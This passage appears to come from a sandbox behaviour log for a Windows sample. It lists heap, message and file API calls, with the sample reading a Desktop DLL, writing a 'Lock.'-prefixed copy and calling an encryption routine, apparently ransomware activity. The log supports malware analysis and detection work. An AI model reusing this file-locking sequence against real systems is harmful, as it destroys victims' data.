(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0205.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0205.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0205.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0205.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0205.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0205.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0205.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0205.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0205.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0205.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0205.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0205.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0205.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0205.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0205.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0205.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0205.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0205.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0205.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0205.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0205.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0205.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0205.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0205.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0205.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0205.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0205.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0205.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0205.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0205.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0205.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0205.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0205.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0205.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0205.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0205.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0205.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0205.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0205.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0205.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0205.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0205.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0205.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0205.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0205.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0205.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0205.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0205.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0205.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0205.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0205.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0205.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0205.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0205.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0205.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0205.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0205.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0205.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0205.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0205.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0205.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0205.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0205.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0205.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0205.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0205.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0205.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0205.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0205.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0205.401] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0205.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0205.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0205.401] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0205.401] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0205.401] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0205.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0205.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0205.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0205.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0205.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0205.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0205.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0205.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0205.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0205.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0205.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0205.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0205.401] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/SafePC_ver1.0.dll" (normalized: "c:\\users\\fd1hvy\\desktop\\safepc_ver1.0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0205.402] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.402] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0205.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0205.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0205.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0205.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0205.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0205.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0205.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0205.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0205.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0205.402] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0205.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0205.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0205.402] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0205.403] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0205.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0205.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0205.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0205.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0205.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0205.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0205.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0205.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0205.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0205.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0205.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0205.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0205.403] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0205.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0205.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0205.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0205.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f14010 [0205.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0205.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0205.403] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.SafePC_ver1.0.dll" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.safepc_ver1.0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0205.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0205.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0205.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0205.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0205.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0205.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0205.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0205.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0205.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0205.515] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0205.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0205.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0205.515] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0205.515] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0205.515] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0205.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0205.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0205.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0205.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0205.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0205.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0205.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0205.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0205.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0205.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0205.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0205.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0205.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0205.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0205.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe55020 [0205.520] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0205.520] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0xb000, lpOverlapped=0x0) returned 1 [0205.785] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0205.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0205.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0205.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0205.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0205.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb000) returned 0x2f24018 [0205.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe55020 | out: hHeap=0x970000) returned 1 [0205.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0205.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0205.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0205.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0205.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0205.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0205.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0205.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0205.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb000) returned 0x2f2f020 [0205.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0205.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0205.791] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0205.792] TranslateMessage (lpMsg=0x8cf708) returned 0 [0205.792] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0205.792] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0205.792] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0205.792] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0205.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0205.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0205.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0205.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0205.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb000) returned 0x2f24018 [0205.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0205.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0205.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0205.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0205.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0205.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0205.795] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0205.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0205.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0205.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0205.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0205.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0205.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0205.795] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0205.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0205.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0205.795] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0205.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0205.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0205.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0205.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0205.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0205.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0205.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0205.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0205.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb000) returned 0x2f24018 [0205.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0205.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 